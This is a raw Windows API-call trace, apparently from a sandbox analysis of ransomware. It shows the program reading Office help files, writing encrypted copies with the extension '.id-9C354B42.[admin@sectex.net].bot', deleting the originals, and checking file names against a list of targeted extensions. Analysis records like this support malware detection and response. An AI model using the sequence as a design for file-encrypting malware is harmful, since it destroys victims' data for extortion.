	[0148.166] ReadFile (in: hFile=0x38c, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x26d, lpOverlapped=0x0) returned 1
	[0148.168] WriteFile (in: hFile=0x388, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x270, lpOverlapped=0x0) returned 1
	[0148.169] ReadFile (in: hFile=0x38c, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.169] WriteFile (in: hFile=0x388, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xee, lpOverlapped=0x0) returned 1
	[0148.169] SetEndOfFile (hFile=0x388) returned 1
	[0148.169] CloseHandle (hObject=0x388) returned 1
	[0148.169] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.169] SetEndOfFile (hFile=0x38c) returned 1
	[0148.171] CloseHandle (hObject=0x38c) returned 1
	[0148.171] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.172] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_col.hxc")) returned 1
	[0148.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXC") returned 61
	[0148.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXC") returned 61
	[0148.172] lstrlenW (lpString=".doc") returned 4
	[0148.172] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0148.172] lstrlenW (lpString=".docx") returned 5
	[0148.172] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0148.172] lstrlenW (lpString=".pdf") returned 4
	[0148.172] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0148.172] lstrlenW (lpString=".xls") returned 4
	[0148.172] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0148.172] lstrlenW (lpString=".xlsx") returned 5
	[0148.172] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0148.172] lstrlenW (lpString=".ppt") returned 4
	[0148.173] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0148.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXC") returned 61
	[0148.173] lstrlenW (lpString=".zip") returned 4
	[0148.173] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0148.173] lstrlenW (lpString=".rar") returned 4
	[0148.173] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0148.173] lstrlenW (lpString=".bz2") returned 4
	[0148.173] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0148.173] lstrlenW (lpString=".7z") returned 3
	[0148.173] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0148.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXC") returned 61
	[0148.173] lstrlenW (lpString=".dbf") returned 4
	[0148.173] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0148.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXC") returned 61
	[0148.173] lstrlenW (lpString=".1cd") returned 4
	[0148.173] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0148.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXC") returned 61
	[0148.173] lstrlenW (lpString=".jpg") returned 4
	[0148.173] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0148.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXC") returned 61
	[0148.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXC") returned 61
	[0148.173] lstrlenW (lpString=".doc") returned 4
	[0148.173] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0148.173] lstrlenW (lpString=".docx") returned 5
	[0148.173] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0148.173] lstrlenW (lpString=".pdf") returned 4
	[0148.173] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0148.173] lstrlenW (lpString=".xls") returned 4
	[0148.173] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0148.173] lstrlenW (lpString=".xlsx") returned 5
	[0148.174] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0148.174] lstrlenW (lpString=".ppt") returned 4
	[0148.174] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0148.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXC") returned 61
	[0148.174] lstrlenW (lpString=".zip") returned 4
	[0148.174] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0148.174] lstrlenW (lpString=".rar") returned 4
	[0148.174] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0148.174] lstrlenW (lpString=".bz2") returned 4
	[0148.174] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0148.174] lstrlenW (lpString=".7z") returned 3
	[0148.174] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0148.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXC") returned 61
	[0148.174] lstrlenW (lpString=".dbf") returned 4
	[0148.174] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0148.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXC") returned 61
	[0148.174] lstrlenW (lpString=".1cd") returned 4
	[0148.174] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0148.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXC") returned 61
	[0148.174] lstrlenW (lpString=".jpg") returned 4
	[0148.174] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0148.174] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0148.174] lstrlenW (lpString="MSPUB_COL.HXT") returned 13
	[0148.174] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0148.175] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=205) returned 1
	[0148.175] CloseHandle (hObject=0x38c) returned 1
	[0148.175] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_col.hxt")) returned 0x20
	[0148.175] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0148.175] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.175] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0148.176] GetLastError () returned 0x0
	[0148.176] ReadFile (in: hFile=0x38c, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xcd, lpOverlapped=0x0) returned 1
	[0148.177] WriteFile (in: hFile=0x388, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xd0, lpOverlapped=0x0) returned 1
	[0148.178] ReadFile (in: hFile=0x38c, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.178] WriteFile (in: hFile=0x388, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xee, lpOverlapped=0x0) returned 1
	[0148.178] SetEndOfFile (hFile=0x388) returned 1
	[0148.178] CloseHandle (hObject=0x388) returned 1
	[0148.178] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.179] SetEndOfFile (hFile=0x38c) returned 1
	[0148.181] CloseHandle (hObject=0x38c) returned 1
	[0148.181] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.181] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_col.hxt")) returned 1
	[0148.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT") returned 61
	[0148.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT") returned 61
	[0148.182] lstrlenW (lpString=".doc") returned 4
	[0148.182] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0148.182] lstrlenW (lpString=".docx") returned 5
	[0148.182] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0148.182] lstrlenW (lpString=".pdf") returned 4
	[0148.182] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0148.182] lstrlenW (lpString=".xls") returned 4
	[0148.182] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0148.182] lstrlenW (lpString=".xlsx") returned 5
	[0148.182] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0148.182] lstrlenW (lpString=".ppt") returned 4
	[0148.182] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0148.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT") returned 61
	[0148.182] lstrlenW (lpString=".zip") returned 4
	[0148.182] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0148.182] lstrlenW (lpString=".rar") returned 4
	[0148.182] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0148.182] lstrlenW (lpString=".bz2") returned 4
	[0148.182] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0148.182] lstrlenW (lpString=".7z") returned 3
	[0148.182] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0148.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT") returned 61
	[0148.182] lstrlenW (lpString=".dbf") returned 4
	[0148.182] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0148.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT") returned 61
	[0148.182] lstrlenW (lpString=".1cd") returned 4
	[0148.182] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0148.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT") returned 61
	[0148.182] lstrlenW (lpString=".jpg") returned 4
	[0148.183] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0148.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT") returned 61
	[0148.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT") returned 61
	[0148.183] lstrlenW (lpString=".doc") returned 4
	[0148.183] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0148.183] lstrlenW (lpString=".docx") returned 5
	[0148.183] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0148.183] lstrlenW (lpString=".pdf") returned 4
	[0148.183] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0148.183] lstrlenW (lpString=".xls") returned 4
	[0148.183] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0148.183] lstrlenW (lpString=".xlsx") returned 5
	[0148.183] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0148.183] lstrlenW (lpString=".ppt") returned 4
	[0148.183] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0148.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT") returned 61
	[0148.183] lstrlenW (lpString=".zip") returned 4
	[0148.183] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0148.183] lstrlenW (lpString=".rar") returned 4
	[0148.183] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0148.183] lstrlenW (lpString=".bz2") returned 4
	[0148.183] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0148.183] lstrlenW (lpString=".7z") returned 3
	[0148.183] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0148.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT") returned 61
	[0148.183] lstrlenW (lpString=".dbf") returned 4
	[0148.183] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0148.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT") returned 61
	[0148.183] lstrlenW (lpString=".1cd") returned 4
	[0148.183] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0148.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT") returned 61
	[0148.183] lstrlenW (lpString=".jpg") returned 4
	[0148.184] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0148.184] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0148.184] lstrlenW (lpString="MSPUB_F_COL.HXK") returned 15
	[0148.184] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0148.184] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=114) returned 1
	[0148.184] CloseHandle (hObject=0x38c) returned 1
	[0148.184] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_f_col.hxk")) returned 0x20
	[0148.184] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.185] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0148.185] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.185] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.185] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0148.185] GetLastError () returned 0x0
	[0148.185] ReadFile (in: hFile=0x38c, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x72, lpOverlapped=0x0) returned 1
	[0148.186] WriteFile (in: hFile=0x388, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x80, lpOverlapped=0x0) returned 1
	[0148.187] ReadFile (in: hFile=0x38c, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.187] WriteFile (in: hFile=0x388, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0148.187] SetEndOfFile (hFile=0x388) returned 1
	[0148.187] CloseHandle (hObject=0x388) returned 1
	[0148.187] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.187] SetEndOfFile (hFile=0x38c) returned 1
	[0148.288] CloseHandle (hObject=0x38c) returned 1
	[0148.289] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.320] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_f_col.hxk")) returned 1
	[0148.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_F_COL.HXK") returned 63
	[0148.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_F_COL.HXK") returned 63
	[0148.499] lstrlenW (lpString=".doc") returned 4
	[0148.499] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0148.499] lstrlenW (lpString=".docx") returned 5
	[0148.499] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0148.499] lstrlenW (lpString=".pdf") returned 4
	[0148.499] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0148.499] lstrlenW (lpString=".xls") returned 4
	[0148.499] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0148.499] lstrlenW (lpString=".xlsx") returned 5
	[0148.499] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0148.499] lstrlenW (lpString=".ppt") returned 4
	[0148.499] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0148.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_F_COL.HXK") returned 63
	[0148.499] lstrlenW (lpString=".zip") returned 4
	[0148.499] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0148.499] lstrlenW (lpString=".rar") returned 4
	[0148.499] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0148.499] lstrlenW (lpString=".bz2") returned 4
	[0148.499] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0148.499] lstrlenW (lpString=".7z") returned 3
	[0148.499] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0148.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_F_COL.HXK") returned 63
	[0148.499] lstrlenW (lpString=".dbf") returned 4
	[0148.499] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0148.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_F_COL.HXK") returned 63
	[0148.499] lstrlenW (lpString=".1cd") returned 4
	[0148.499] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0148.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_F_COL.HXK") returned 63
	[0148.500] lstrlenW (lpString=".jpg") returned 4
	[0148.500] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0148.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_F_COL.HXK") returned 63
	[0148.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_F_COL.HXK") returned 63
	[0148.500] lstrlenW (lpString=".doc") returned 4
	[0148.500] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0148.500] lstrlenW (lpString=".docx") returned 5
	[0148.500] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0148.500] lstrlenW (lpString=".pdf") returned 4
	[0148.500] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0148.500] lstrlenW (lpString=".xls") returned 4
	[0148.500] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0148.500] lstrlenW (lpString=".xlsx") returned 5
	[0148.500] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0148.500] lstrlenW (lpString=".ppt") returned 4
	[0148.500] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0148.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_F_COL.HXK") returned 63
	[0148.500] lstrlenW (lpString=".zip") returned 4
	[0148.500] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0148.500] lstrlenW (lpString=".rar") returned 4
	[0148.500] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0148.500] lstrlenW (lpString=".bz2") returned 4
	[0148.500] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0148.500] lstrlenW (lpString=".7z") returned 3
	[0148.500] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0148.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_F_COL.HXK") returned 63
	[0148.500] lstrlenW (lpString=".dbf") returned 4
	[0148.500] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0148.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_F_COL.HXK") returned 63
	[0148.500] lstrlenW (lpString=".1cd") returned 4
	[0148.500] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0148.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_F_COL.HXK") returned 63
	[0148.501] lstrlenW (lpString=".jpg") returned 4
	[0148.501] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0148.501] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0148.501] lstrlenW (lpString="OIS.HXS") returned 7
	[0148.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0148.679] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=457988) returned 1
	[0148.680] CloseHandle (hObject=0x3d4) returned 1
	[0148.680] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois.hxs")) returned 0x20
	[0148.684] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0148.684] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.684] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.685] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois.hxs.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0148.685] GetLastError () returned 0x0
	[0148.685] ReadFile (in: hFile=0x3d4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x6fd04, lpOverlapped=0x0) returned 1
	[0148.731] WriteFile (in: hFile=0x3ac, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x6fd10, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x6fd10, lpOverlapped=0x0) returned 1
